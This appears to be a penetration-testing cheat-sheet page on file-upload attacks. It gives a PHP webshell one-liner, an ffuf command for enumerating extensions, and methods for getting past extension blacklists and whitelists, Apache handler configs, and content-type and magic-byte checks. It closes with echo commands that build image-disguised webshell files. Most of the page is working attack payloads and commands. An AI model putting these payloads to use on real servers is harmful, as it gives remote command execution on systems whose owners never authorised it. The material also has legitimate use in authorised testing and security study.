Webshells#

<?php system($_REQUEST["cmd"]); ?>

Bypass validations#

Client side#

Disable js, or use a intercepting proxy like burp or ZAP. You should be pretty familiar with this so no instructions here

Blacklist filter#

This is when webapp blocks certain extensions like php, phps, php7. Not effective, since we can use another file extension to execute php code, like phar

First we can find all the extensions that this webapp uses.

ffuf -u "http://$target/FUZZ" -w /usr/share/wordlists/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ

After we got a list of what we extensions we can use, we can try uploading our webshell, changing the extension

Whitelist filter#

This is when webapp only allow certain extensions like .jpg, jpeg, png Secure, but sometimes we can find a vulnerability.

Double Extensions#

When the webapp checks for extensions using regex, like ^.*\.(jpg|jpeg|png|gif)

There is a vulnerability in there, that the regex only check for .jpg, jpeg, png, gif in the file name, but not at the end of file name.

So we can simply rename our webshell to shell.jpg.php

Reverse Double Extensions#

This is when the web server configuration itself is vulnerable. For example, this Apache2 config:

<FilesMatch ".+\.ph(ar|p|tml)">
    SetHandler application/x-httpd-php
</FilesMatch>

The above config determines which file to allow php execution. Again, not checking if the extension is at the end of file name

So we can simply rename our webshell to shell.php.jpg

Character injection#

  • %20
  • %0a
  • %00
  • %0d0a
  • /
  • .\
  • .
  • :

Basically a way to “terminate” the string, so it ends at .php

eg. shell.php%00.jpg. Btw the %00 null termination trick is patched since php 5.?? something idk

Type filter#

Content Type#

This is when the webapp looks only at Content-type header we sent, which we can “spoof”

Mime Type#

This is when the webapp actually determines our file type by looking at the Magic Bytes. Can be bypassed easily.

echo 'GIF8;' > shell.gif
echo '89504E470D0A1A0A' | xxd -r -p > shell.png
echo 'FFD8FFDB' | xxd -r -p > shell.jpg

Then append our webshell after that

echo '<?php system($_REQUEST["cmd"]); ?>' >> shell.gif
echo '<?php system($_REQUEST["cmd"]); ?>' >> shell.png
echo '<?php system($_REQUEST["cmd"]); ?>' >> shell.jpg
Backward Csrf Graph Ql Forward